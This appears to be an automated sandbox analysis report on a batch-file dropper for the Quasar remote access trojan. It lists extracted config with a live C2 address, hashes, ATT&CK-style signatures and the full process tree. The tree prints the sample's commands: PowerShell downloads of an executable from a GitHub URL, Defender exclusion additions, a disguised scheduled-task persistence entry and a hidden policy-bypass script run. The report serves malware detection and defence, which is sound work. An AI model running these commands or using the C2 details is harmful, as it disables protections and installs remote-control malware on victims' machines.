Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2024 17:40
Static task
static1
Behavioral task
behavioral1
Sample
CritScriptInstaller.bat
Resource
win7-20241010-en
General
-
Target
CritScriptInstaller.bat
-
Size
6KB
-
MD5
a3ea9257f9f074a20df56d8978be9e77
-
SHA1
68d029092c7a591aac215e25269329c3c3859436
-
SHA256
32d2658a968790aa0039cf23fd097da860b938fb07d8d0b2f6779a71f40817b1
-
SHA512
a61143e0680eb03fbf625da8a58aa338e88f0e12c65a3c07b2c10eead02e7a753d64e3d4271c34b04941ef772d3e772f28b53355b1a46ce4fc6aafff164c3b46
-
SSDEEP
192:k+6tCGPbseHYtPpUaYIKopCA8KyiXn2rCxHF:kviPpUaYIKor2i
Malware Config
Extracted
quasar
1.4.1
DDNS
193.161.193.99:32471
807f3187-d087-4fff-beff-e73293a32af8
-
encryption_key
81A0C14D4C705B3C678E573C849DE7F6A3671A8B
-
install_name
jusched.exe
-
log_directory
CachedLogs
-
reconnect_delay
3000
-
startup_key
Java Update Scheduler
-
subdirectory
Java
Signatures
-
Quasar family
-
Quasar payload 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000d000000023c95-93.dat family_quasar behavioral2/files/0x0008000000023ca1-99.dat family_quasar behavioral2/memory/4384-108-0x0000000000E80000-0x00000000011A4000-memory.dmp family_quasar -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeflow pid Process 4 4328 powershell.exe 6 4812 powershell.exe 18 2316 powershell.exe 19 3396 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2316 powershell.exe 3396 powershell.exe 4328 powershell.exe 4812 powershell.exe 1128 powershell.exe 3908 powershell.exe 3588 powershell.exe 3568 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
CritScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation CritScript.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid Process 1128 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
CritScript.exeJUSCHED.EXEjusched.exeJUSCHED.EXEpid Process 4004 CritScript.exe 4384 JUSCHED.EXE 3940 jusched.exe 4128 JUSCHED.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
Processes:
flow ioc 4 raw.githubusercontent.com 6 raw.githubusercontent.com 18 raw.githubusercontent.com 19 raw.githubusercontent.com 3 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
CritScript.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CritScript.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid Process 1156 timeout.exe 1908 timeout.exe -
Modifies registry class 2 IoCs
Processes:
CritScript.exeOpenWith.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings CritScript.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings OpenWith.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 1500 schtasks.exe 4600 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4328 powershell.exe 4328 powershell.exe 3908 powershell.exe 3908 powershell.exe 3588 powershell.exe 3588 powershell.exe 3568 powershell.exe 3568 powershell.exe 4812 powershell.exe 4812 powershell.exe 2316 powershell.exe 2316 powershell.exe 3396 powershell.exe 3396 powershell.exe 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeJUSCHED.EXEjusched.exeJUSCHED.EXEpowershell.exedescription pid Process Token: SeDebugPrivilege 4328 powershell.exe Token: SeDebugPrivilege 3908 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 3396 powershell.exe Token: SeDebugPrivilege 4384 JUSCHED.EXE Token: SeDebugPrivilege 3940 jusched.exe Token: SeDebugPrivilege 4128 JUSCHED.EXE Token: SeDebugPrivilege 1128 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
OpenWith.exejusched.exepid Process 4964 OpenWith.exe 3940 jusched.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
cmd.execmd.exeCritScript.exeJUSCHED.EXEjusched.exedescription pid Process procid_target PID 3764 wrote to memory of 4328 3764 cmd.exe 84 PID 3764 wrote to memory of 4328 3764 cmd.exe 84 PID 3764 wrote to memory of 4132 3764 cmd.exe 85 PID 3764 wrote to memory of 4132 3764 cmd.exe 85 PID 4132 wrote to memory of 2328 4132 cmd.exe 87 PID 4132 wrote to memory of 2328 4132 cmd.exe 87 PID 4132 wrote to memory of 3908 4132 cmd.exe 88 PID 4132 wrote to memory of 3908 4132 cmd.exe 88 PID 4132 wrote to memory of 3588 4132 cmd.exe 89 PID 4132 wrote to memory of 3588 4132 cmd.exe 89 PID 4132 wrote to memory of 3568 4132 cmd.exe 90 PID 4132 wrote to memory of 3568 4132 cmd.exe 90 PID 4132 wrote to memory of 4812 4132 cmd.exe 91 PID 4132 wrote to memory of 4812 4132 cmd.exe 91 PID 4132 wrote to memory of 2316 4132 cmd.exe 98 PID 4132 wrote to memory of 2316 4132 cmd.exe 98 PID 4132 wrote to memory of 3396 4132 cmd.exe 102 PID 4132 wrote to memory of 3396 4132 cmd.exe 102 PID 4132 wrote to memory of 4004 4132 cmd.exe 104 PID 4132 wrote to memory of 4004 4132 cmd.exe 104 PID 4132 wrote to memory of 4004 4132 cmd.exe 104 PID 4132 wrote to memory of 1156 4132 cmd.exe 105 PID 4132 wrote to memory of 1156 4132 cmd.exe 105 PID 4004 wrote to memory of 4384 4004 CritScript.exe 106 PID 4004 wrote to memory of 4384 4004 CritScript.exe 106 PID 4384 wrote to memory of 4600 4384 JUSCHED.EXE 111 PID 4384 wrote to memory of 4600 4384 JUSCHED.EXE 111 PID 4384 wrote to memory of 3940 4384 JUSCHED.EXE 113 PID 4384 wrote to memory of 3940 4384 JUSCHED.EXE 113 PID 3940 wrote to memory of 1500 3940 jusched.exe 115 PID 3940 wrote to memory of 1500 3940 jusched.exe 115 PID 4132 wrote to memory of 4128 4132 cmd.exe 117 PID 4132 wrote to memory of 4128 4132 cmd.exe 117 PID 4132 wrote to memory of 1908 4132 cmd.exe 118 PID 4132 wrote to memory of 1908 4132 cmd.exe 118 PID 4132 wrote to memory of 1128 4132 cmd.exe 119 PID 4132 wrote to memory of 1128 4132 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CritScriptInstaller.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.bat' -OutFile CritScript.bat"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K CritScript.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"3⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Desktop'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/Downloads'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin/AppData/'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/CritScript.exe' -OutFile CritScript.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/ahk.ico' -OutFile ahk.ico"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest 'https://raw.githubusercontent.com/Xevioo/XevioHub/main/shortcut.ps1' -OutFile shortcut.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Users\Admin\AppData\Local\Temp\CritScript.exeCritScript.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4600
-
-
C:\Users\Admin\AppData\Roaming\Java\jusched.exe"C:\Users\Admin\AppData\Roaming\Java\jusched.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:1500
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXEjusched.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\shortcut.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4964
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD53b2a05f3fbe16d06391db3335944b77c
SHA11ecab602face79029c53e2dddb49a12b7a808a79
SHA256185551abd0332fddc9593c6f5e6d982c4917ce2e418d56ac45b0537c13ed5d60
SHA512782ecdda938503b560c23a12c3ec5ab8c81590d36f3a7e866cd27c2d26c30339fc71ef770be0d422fd43ff8fb2f3ac665776c86be4a9d9d0a2e9cd9236ce0fc5
-
Filesize
1KB
MD57ab00d2b8ad3a0a8426f6a535086b700
SHA15b912f4345328372093354ff2ba6a932fef4a8ab
SHA256cc27d1633ff5a4401c75569e6cd8f98e7ab09f01b8dfb0399f82efe197e0ca0c
SHA512839e5fbdcc406cee2f37a156ccbb772a80a0231508a7925f95e162990b31ea8366442fcd6073c9035905b47a34d60a3434cc776babf9d49521663b8d3e400584
-
Filesize
64B
MD58a424e81b5a6078deff05e153c04a0ee
SHA1bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b
SHA25679ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3
SHA512aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
Filesize
1KB
MD586f1b58eabec7e21739a4df55d272c7c
SHA19df879518b19a9c8e2633696a2096990fe99e9ab
SHA2562fa1176643443c45f51312be88effd28bcf7bb4309123cee363daa02afcf07a8
SHA51220d60b79c69ebc1eb695227abbd014625e1dfe527c0c31f245169e09d3c61238a7b357a1a252b594424a0dfa9abde7a3123b5b8660342a7e32dbccb6fbc5ea22
-
Filesize
2KB
MD542b967e318ec3384c82049f18bff79f5
SHA1c719bfd3fe63989c68c170e59ae8aa5ccb479b25
SHA2566a5596feba2d73f3390ede572e09c3edce0da3df1e679838cdb51dc7c1df805e
SHA512b578ada683bfa871a19baad1c62b04315c2fdb4e193371971202e0476470e75fe8a9fc5cb75b6a79f73657ce35a1e10929f5df585634fcb9a755b6ba4193f166
-
Filesize
3.2MB
MD5c28dc010fc5198442496bc07dd50cd5d
SHA10f90a005815c2700a65ea85ae86f13a182cc11e6
SHA2561b701daded4124260a49040d83dec15c627b8e4a1a04dc378aae7fecfca3abf3
SHA5127c94bafa48db045a864a778a010a7d1d03204828bd103a86c1267732a51260b0e689a799cc7e95410ceedd1254fb91aa3f19f62efa3e41e40be645862a4e07e2
-
Filesize
3.1MB
MD5bd4dcbdfdb5fdc1f95bd1168f166153a
SHA19db60cf0f8a8b88d3c4601df25963536aaeb1884
SHA256902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a
SHA51226ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2
-
Filesize
6KB
MD54378ec2852917fed7f557291e72251a6
SHA1104b3e944a713760b1fe491679ff3aa0af32298b
SHA2562ba38af1ffa558f31af78ae94c3369d92366838d5cb1e5c01c58369bc92ac914
SHA512162541d9cf8facddc824e65c0a9eb5760c95bf011ad69fdbd79890d9b44324b7e25cc3011ef2a9d0bdd351122148b8e5e9e627eb754f5383dd64bd35bd84db56
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD50bd19f7c1c4e8b5ed89da56ae5f8adb0
SHA1a2384a83aea7d7568fc8ebd280b7722b0efd6902
SHA25662ec8d3ae53114ba6d6d2a41ee59dd4866e7cd8e2fcbd6793b0cc40bc85e622f
SHA512dbd7268491aa5ec39e89f71febcdc18cb6c96bbba617a1734eef55711ed70c3bf78960e94e8595e9d3b618b9cfc2ab9ff4d8e0c73d97a0c77b504b36be573f53